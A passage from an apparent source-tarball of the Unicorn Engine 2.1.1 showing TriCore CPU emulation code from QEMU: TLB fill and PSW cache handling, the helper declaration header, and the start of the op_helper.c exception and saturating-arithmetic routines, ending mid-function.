    hwaddr phys_addr;
    int prot;
    int mmu_idx = cpu_mmu_index(&cpu->env, false);

    if (get_physical_address(&cpu->env, &phys_addr, &prot, addr,
                             MMU_DATA_LOAD, mmu_idx)) {
        return -1;
    }
    return phys_addr;
}
#endif

/* TODO: Add exception support */
static void raise_mmu_exception(CPUTriCoreState *env, target_ulong address,
                                int rw, int tlb_error)
{
}

bool tricore_cpu_tlb_fill(CPUState *cs, vaddr address, int size,
                          MMUAccessType rw, int mmu_idx,
                          bool probe, uintptr_t retaddr)
{
    TriCoreCPU *cpu = TRICORE_CPU(cs);
    CPUTriCoreState *env = &cpu->env;
    hwaddr physical;
    int prot;
    int ret = 0;

    rw &= 1;
    ret = get_physical_address(env, &physical, &prot,
                               address, rw, mmu_idx);

    // qemu_log_mask(CPU_LOG_MMU, "%s address=" TARGET_FMT_lx " ret %d physical "
    //               TARGET_FMT_plx " prot %d\n",
    //               __func__, (target_ulong)address, ret, physical, prot);

    if (ret == TLBRET_MATCH) {
        tlb_set_page(cs, address & TARGET_PAGE_MASK,
                     physical & TARGET_PAGE_MASK, prot | PAGE_EXEC,
                     mmu_idx, TARGET_PAGE_SIZE);
        return true;
    } else {
        assert(ret < 0);
        if (probe) {
            return false;
        }
        raise_mmu_exception(env, address, rw, ret);
        cpu_loop_exit_restore(cs, retaddr);
    }
}

#if 0
static void tricore_cpu_list_entry(gpointer data, gpointer user_data)
{
    ObjectClass *oc = data;
    const char *typename;
    char *name;

    typename = object_class_get_name(oc);
    name = g_strndup(typename, strlen(typename) - strlen("-" TYPE_TRICORE_CPU));
    qemu_printf("  %s\n", name);
    g_free(name);
}
#endif

#if 0
void tricore_cpu_list(void)
{
    GSList *list;

    list = object_class_get_list_sorted(TYPE_TRICORE_CPU, false);
    qemu_printf("Available CPUs:\n");
    g_slist_foreach(list, tricore_cpu_list_entry, NULL);
    g_slist_free(list);
}
#endif

void fpu_set_state(CPUTriCoreState *env)
{
    set_float_rounding_mode(env->PSW & MASK_PSW_FPU_RM, &env->fp_status);
    set_flush_inputs_to_zero(1, &env->fp_status);
    set_flush_to_zero(1, &env->fp_status);
    set_default_nan_mode(1, &env->fp_status);
}

uint32_t psw_read(CPUTriCoreState *env)
{
    /* clear all USB bits */
    env->PSW &= 0x6ffffff;
    /* now set them from the cache */
    env->PSW |= ((env->PSW_USB_C != 0) << 31);
    env->PSW |= ((env->PSW_USB_V & (1 << 31)) >> 1);
    env->PSW |= ((env->PSW_USB_SV & (1 << 31)) >> 2);
    env->PSW |= ((env->PSW_USB_AV & (1 << 31)) >> 3);
    env->PSW |= ((env->PSW_USB_SAV & (1 << 31)) >> 4);

    return env->PSW;
}

void psw_write(CPUTriCoreState *env, uint32_t val)
{
    env->PSW_USB_C = (val & MASK_USB_C);
    env->PSW_USB_V = (val & MASK_USB_V) << 1;
    env->PSW_USB_SV = (val & MASK_USB_SV) << 2;
    env->PSW_USB_AV = (val & MASK_USB_AV) << 3;
    env->PSW_USB_SAV = (val & MASK_USB_SAV) << 4;
    env->PSW = val;

    fpu_set_state(env);
}
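/*
 * Illustrative sketch (added commentary, not part of the original file),
 * assuming a zero-initialized CPUTriCoreState: psw_write() caches each PSW
 * user status bit (C, V, SV, AV, SAV) in bit 31 of its own cache word, and
 * psw_read() packs the cached bits back into the architectural PSW, so the
 * two calls round-trip any USB bit pattern. The helper name below is
 * hypothetical.
 */
#if 0
static void psw_usb_roundtrip_demo(CPUTriCoreState *env)
{
    uint32_t psw = MASK_USB_C | MASK_USB_V | MASK_USB_SAV; /* 0xC8000000 */

    psw_write(env, psw);
    /* every cached flag word carries its flag in bit 31 */
    assert(env->PSW_USB_C & (1u << 31));
    assert(env->PSW_USB_V & (1u << 31));
    assert(env->PSW_USB_SAV & (1u << 31));
    /* packing the cache back reproduces the value that was written */
    assert(psw_read(env) == psw);
}
#endif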
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/helper.h����������������������������������������������������������0000664�0000000�0000000�00000016170�14675241067�0020545�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(uc_tricore_exit,void, env) /* Arithmetic */ DEF_HELPER_3(add_ssov, i32, env, i32, i32) DEF_HELPER_3(add64_ssov, i64, env, i64, i64) DEF_HELPER_3(add_suov, i32, env, i32, i32) DEF_HELPER_3(add_h_ssov, i32, env, i32, i32) DEF_HELPER_3(add_h_suov, i32, env, i32, i32) DEF_HELPER_4(addr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_4(addsur_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_3(sub_ssov, i32, env, i32, i32) DEF_HELPER_3(sub64_ssov, i64, env, i64, i64) DEF_HELPER_3(sub_suov, i32, env, i32, i32) DEF_HELPER_3(sub_h_ssov, i32, env, i32, i32) DEF_HELPER_3(sub_h_suov, i32, env, i32, i32) DEF_HELPER_4(subr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_4(subadr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_3(mul_ssov, i32, env, i32, i32) DEF_HELPER_3(mul_suov, i32, env, i32, i32) DEF_HELPER_3(sha_ssov, i32, env, i32, i32) DEF_HELPER_3(absdif_ssov, i32, env, i32, i32) DEF_HELPER_4(madd32_ssov, i32, env, i32, i32, i32) DEF_HELPER_4(madd32_suov, i32, env, i32, i32, i32) DEF_HELPER_4(madd64_ssov, i64, env, i32, i64, i32) DEF_HELPER_5(madd64_q_ssov, i64, env, i64, i32, i32, i32) DEF_HELPER_3(madd32_q_add_ssov, i32, env, i64, i64) DEF_HELPER_5(maddr_q_ssov, i32, env, i32, i32, i32, i32) DEF_HELPER_4(madd64_suov, i64, env, i32, i64, i32) DEF_HELPER_4(msub32_ssov, i32, env, i32, i32, i32) DEF_HELPER_4(msub32_suov, i32, env, i32, i32, i32) DEF_HELPER_4(msub64_ssov, i64, env, i32, i64, i32) DEF_HELPER_5(msub64_q_ssov, i64, env, i64, i32, i32, i32) DEF_HELPER_3(msub32_q_sub_ssov, i32, env, i64, i64) DEF_HELPER_5(msubr_q_ssov, i32, env, i32, i32, i32, i32) DEF_HELPER_4(msub64_suov, i64, env, i32, i64, i32) 
DEF_HELPER_3(absdif_h_ssov, i32, env, i32, i32) DEF_HELPER_2(abs_ssov, i32, env, i32) DEF_HELPER_2(abs_h_ssov, i32, env, i32) /* hword/byte arithmetic */ DEF_HELPER_2(abs_b, i32, env, i32) DEF_HELPER_2(abs_h, i32, env, i32) DEF_HELPER_3(absdif_b, i32, env, i32, i32) DEF_HELPER_3(absdif_h, i32, env, i32, i32) DEF_HELPER_4(addr_h, i32, env, i64, i32, i32) DEF_HELPER_4(addsur_h, i32, env, i64, i32, i32) DEF_HELPER_5(maddr_q, i32, env, i32, i32, i32, i32) DEF_HELPER_3(add_b, i32, env, i32, i32) DEF_HELPER_3(add_h, i32, env, i32, i32) DEF_HELPER_3(sub_b, i32, env, i32, i32) DEF_HELPER_3(sub_h, i32, env, i32, i32) DEF_HELPER_4(subr_h, i32, env, i64, i32, i32) DEF_HELPER_4(subadr_h, i32, env, i64, i32, i32) DEF_HELPER_5(msubr_q, i32, env, i32, i32, i32, i32) DEF_HELPER_FLAGS_2(eq_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eq_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eqany_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eqany_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ixmax, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(ixmax_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(min_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ixmin, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(ixmin_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) /* count leading ... 
*/ DEF_HELPER_FLAGS_1(clo_h, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(clz_h, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(cls_h, TCG_CALL_NO_RWG_SE, i32, i32) /* sh */ DEF_HELPER_FLAGS_2(sh, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(sh_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_3(sha, i32, env, i32, i32) DEF_HELPER_2(sha_h, i32, i32, i32) /* merge/split/parity */ DEF_HELPER_FLAGS_2(bmerge, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_1(bsplit, TCG_CALL_NO_RWG_SE, i64, i32) DEF_HELPER_FLAGS_1(parity, TCG_CALL_NO_RWG_SE, i32, i32) /* float */ DEF_HELPER_FLAGS_4(pack, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32, i32) DEF_HELPER_1(unpack, i64, i32) DEF_HELPER_3(fadd, i32, env, i32, i32) DEF_HELPER_3(fsub, i32, env, i32, i32) DEF_HELPER_3(fmul, i32, env, i32, i32) DEF_HELPER_3(fdiv, i32, env, i32, i32) DEF_HELPER_4(fmadd, i32, env, i32, i32, i32) DEF_HELPER_4(fmsub, i32, env, i32, i32, i32) DEF_HELPER_3(fcmp, i32, env, i32, i32) DEF_HELPER_2(qseed, i32, env, i32) DEF_HELPER_2(ftoi, i32, env, i32) DEF_HELPER_2(itof, i32, env, i32) DEF_HELPER_2(utof, i32, env, i32) DEF_HELPER_2(ftoiz, i32, env, i32) DEF_HELPER_2(ftouz, i32, env, i32) DEF_HELPER_2(updfl, void, env, i32) /* dvinit */ DEF_HELPER_3(dvinit_b_13, i64, env, i32, i32) DEF_HELPER_3(dvinit_b_131, i64, env, i32, i32) DEF_HELPER_3(dvinit_h_13, i64, env, i32, i32) DEF_HELPER_3(dvinit_h_131, i64, env, i32, i32) DEF_HELPER_FLAGS_2(dvadj, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(dvstep, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(dvstep_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_3(divide, i64, env, i32, i32) DEF_HELPER_3(divide_u, i64, env, i32, i32) /* mulh */ DEF_HELPER_FLAGS_5(mul_h, TCG_CALL_NO_RWG_SE, i64, i32, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(mulm_h, TCG_CALL_NO_RWG_SE, i64, i32, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(mulr_h, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32, i32, i32) /* crc32 */ DEF_HELPER_FLAGS_2(crc32, TCG_CALL_NO_RWG_SE, i32, i32, i32) /* CSA */ DEF_HELPER_2(call, void, env, i32) DEF_HELPER_1(ret, void, env) DEF_HELPER_2(bisr, void, env, i32) DEF_HELPER_1(rfe, void, env) DEF_HELPER_1(rfm, void, env) DEF_HELPER_2(ldlcx, void, env, i32) DEF_HELPER_2(lducx, void, env, i32) DEF_HELPER_2(stlcx, void, env, i32) DEF_HELPER_2(stucx, void, env, i32) DEF_HELPER_1(svlcx, void, env) DEF_HELPER_1(svucx, void, env) DEF_HELPER_1(rslcx, void, env) /* Address mode helper */ DEF_HELPER_1(br_update, i32, i32) DEF_HELPER_2(circ_update, i32, i32, i32) /* PSW cache helper */ DEF_HELPER_2(psw_write, void, env, i32) DEF_HELPER_1(psw_read, i32, env) /* Exceptions */ DEF_HELPER_3(raise_exception_sync, noreturn, env, i32, i32) 
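/*
 * Illustrative note (added, not part of the original header): this file is
 * consumed as an X-macro list. QEMU includes it several times, each time
 * with different definitions of the DEF_HELPER_* macros, to generate
 * prototypes, TCG call wrappers, and the helper registration table from the
 * single list above. A minimal sketch of the prototype-generating pass,
 * using a simplified type mapping (the real machinery lives in
 * exec/helper-head.h and exec/helper-proto.h):
 */
#if 0
#define dh_ctype_i32 uint32_t
#define dh_ctype_env CPUTriCoreState *
#define DEF_HELPER_3(name, ret, t1, t2, t3) \
    dh_ctype_##ret helper_##name(dh_ctype_##t1, dh_ctype_##t2, dh_ctype_##t3);
/* ...one such macro per arity, then: */
#include "helper.h"
/* e.g. DEF_HELPER_3(fadd, i32, env, i32, i32) expands to:
 *   uint32_t helper_fadd(CPUTriCoreState *, uint32_t, uint32_t);
 */
#endif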
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/op_helper.c�������������������������������������������������������0000664�0000000�0000000�00000236132�14675241067�0021240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/crc32c.h" /* Exception helpers */ static void QEMU_NORETURN raise_exception_sync_internal(CPUTriCoreState *env, uint32_t class, int tin, uintptr_t pc, uint32_t fcd_pc) { CPUState *cs = env_cpu(env); /* in case we come from a helper-call we need to restore the PC */ cpu_restore_state(cs, pc, true); /* Tin is loaded into d[15] */ env->gpr_d[15] = tin; if (class == TRAPC_CTX_MNG && tin == TIN3_FCU) { /* upper context cannot be saved, if the context list is empty */ } else { helper_svucx(env); } /* The return address in a[11] is updated */ if (class == TRAPC_CTX_MNG && tin == TIN3_FCD) { env->SYSCON |= MASK_SYSCON_FCD_SF; /* when we run out of CSAs after saving a context a FCD trap is taken and the return address is the start of the trap handler which used the last CSA */ env->gpr_a[11] = fcd_pc; } else if (class == TRAPC_SYSCALL) { env->gpr_a[11] = env->PC + 4; } else { env->gpr_a[11] = env->PC; } /* The stack pointer in A[10] is set to the Interrupt Stack Pointer (ISP) when the processor was not previously using the interrupt stack (in case of PSW.IS = 0). The stack pointer bit is set for using the interrupt stack: PSW.IS = 1. */ if ((env->PSW & MASK_PSW_IS) == 0) { env->gpr_a[10] = env->ISP; } env->PSW |= MASK_PSW_IS; /* The I/O mode is set to Supervisor mode, which means all permissions are enabled: PSW.IO = 10 B .*/ env->PSW |= (2 << 10); /*The current Protection Register Set is set to 0: PSW.PRS = 00 B .*/ env->PSW &= ~MASK_PSW_PRS; /* The Call Depth Counter (CDC) is cleared, and the call depth limit is set for 64: PSW.CDC = 0000000 B .*/ env->PSW &= ~MASK_PSW_CDC; /* Call Depth Counter is enabled, PSW.CDE = 1. 
*/ env->PSW |= MASK_PSW_CDE; /* Write permission to global registers A[0], A[1], A[8], A[9] is disabled: PSW.GW = 0. */ env->PSW &= ~MASK_PSW_GW; /*The interrupt system is globally disabled: ICR.IE = 0. The ‘old’ ICR.IE and ICR.CCPN are saved */ /* PCXI.PIE = ICR.IE */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.PCPN = ICR.CCPN */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* Update PC using the trap vector table */ env->PC = env->BTV | (class << 5); cpu_loop_exit(cs); } void helper_raise_exception_sync(CPUTriCoreState *env, uint32_t class, uint32_t tin) { raise_exception_sync_internal(env, class, tin, 0, 0); } static void raise_exception_sync_helper(CPUTriCoreState *env, uint32_t class, uint32_t tin, uintptr_t pc) { raise_exception_sync_internal(env, class, tin, pc, 0); } /* Addressing mode helper */ static uint16_t reverse16(uint16_t val) { uint8_t high = (uint8_t)(val >> 8); uint8_t low = (uint8_t)(val & 0xff); uint16_t rh, rl; rl = (uint16_t)((high * 0x0202020202ULL & 0x010884422010ULL) % 1023); rh = (uint16_t)((low * 0x0202020202ULL & 0x010884422010ULL) % 1023); return (rh << 8) | rl; } uint32_t helper_br_update(uint32_t reg) { uint32_t index = reg & 0xffff; uint32_t incr = reg >> 16; uint32_t new_index = reverse16(reverse16(index) + reverse16(incr)); return reg - index + new_index; } uint32_t helper_circ_update(uint32_t reg, uint32_t off) { uint32_t index = reg & 0xffff; uint32_t length = reg >> 16; int32_t new_index = index + off; if (new_index < 0) { new_index += length; } else { new_index %= length; } return reg - index + new_index; } static uint32_t ssov32(CPUTriCoreState *env, int64_t arg) { uint32_t ret; int64_t max_pos = INT32_MAX; int64_t max_neg = INT32_MIN; if (arg > max_pos) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_pos; } else { if (arg < max_neg) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_neg; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t suov32_pos(CPUTriCoreState *env, uint64_t arg) { uint32_t ret; uint64_t max_pos = UINT32_MAX; if (arg > max_pos) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_pos; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t suov32_neg(CPUTriCoreState *env, int64_t arg) { uint32_t ret; if (arg < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = 0; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t ssov16(CPUTriCoreState *env, int32_t hw0, int32_t hw1) { int32_t max_pos = INT16_MAX; int32_t max_neg = INT16_MIN; int32_t av0, av1; env->PSW_USB_V = 0; av0 = hw0 ^ hw0 * 2u; if (hw0 > max_pos) { env->PSW_USB_V = (1 << 31); hw0 = max_pos; } else if (hw0 < max_neg) { env->PSW_USB_V = (1 << 31); hw0 = max_neg; } av1 = hw1 ^ hw1 * 2u; if (hw1 > max_pos) { env->PSW_USB_V = (1 << 31); hw1 = max_pos; } else if (hw1 < max_neg) { env->PSW_USB_V = (1 << 31); hw1 = max_neg; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = (av0 | av1) << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return (hw0 & 0xffff) | (hw1 << 16); } static uint32_t suov16(CPUTriCoreState *env, int32_t hw0, int32_t hw1) { int32_t max_pos = UINT16_MAX; int32_t 
av0, av1; env->PSW_USB_V = 0; av0 = hw0 ^ hw0 * 2u; if (hw0 > max_pos) { env->PSW_USB_V = (1 << 31); hw0 = max_pos; } else if (hw0 < 0) { env->PSW_USB_V = (1 << 31); hw0 = 0; } av1 = hw1 ^ hw1 * 2u; if (hw1 > max_pos) { env->PSW_USB_V = (1 << 31); hw1 = max_pos; } else if (hw1 < 0) { env->PSW_USB_V = (1 << 31); hw1 = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = (av0 | av1) << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return (hw0 & 0xffff) | (hw1 << 16); } target_ulong helper_add_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 + t2; return ssov32(env, result); } uint64_t helper_add64_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { uint64_t result; int64_t ovf; result = r1 + r2; ovf = (result ^ r1) & ~(r1 ^ r2); env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if ((int64_t)r1 >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } return result; } target_ulong helper_add_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = sextract32(r1, 0, 16) + sextract32(r2, 0, 16); ret_hw1 = sextract32(r1, 16, 16) + sextract32(r2, 16, 16); return ssov16(env, ret_hw0, ret_hw1); } uint32_t helper_addr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_addsur_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } target_ulong helper_add_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = 
extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 + t2; return suov32_pos(env, result); } target_ulong helper_add_h_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = extract32(r1, 0, 16) + extract32(r2, 0, 16); ret_hw1 = extract32(r1, 16, 16) + extract32(r2, 16, 16); return suov16(env, ret_hw0, ret_hw1); } target_ulong helper_sub_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 - t2; return ssov32(env, result); } uint64_t helper_sub64_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { uint64_t result; int64_t ovf; result = r1 - r2; ovf = (result ^ r1) & (r1 ^ r2); env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if ((int64_t)r1 >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } return result; } target_ulong helper_sub_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = sextract32(r1, 0, 16) - sextract32(r2, 0, 16); ret_hw1 = sextract32(r1, 16, 16) - sextract32(r2, 16, 16); return ssov16(env, ret_hw0, ret_hw1); } uint32_t helper_subr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_subadr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } target_ulong helper_sub_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 - t2; return 
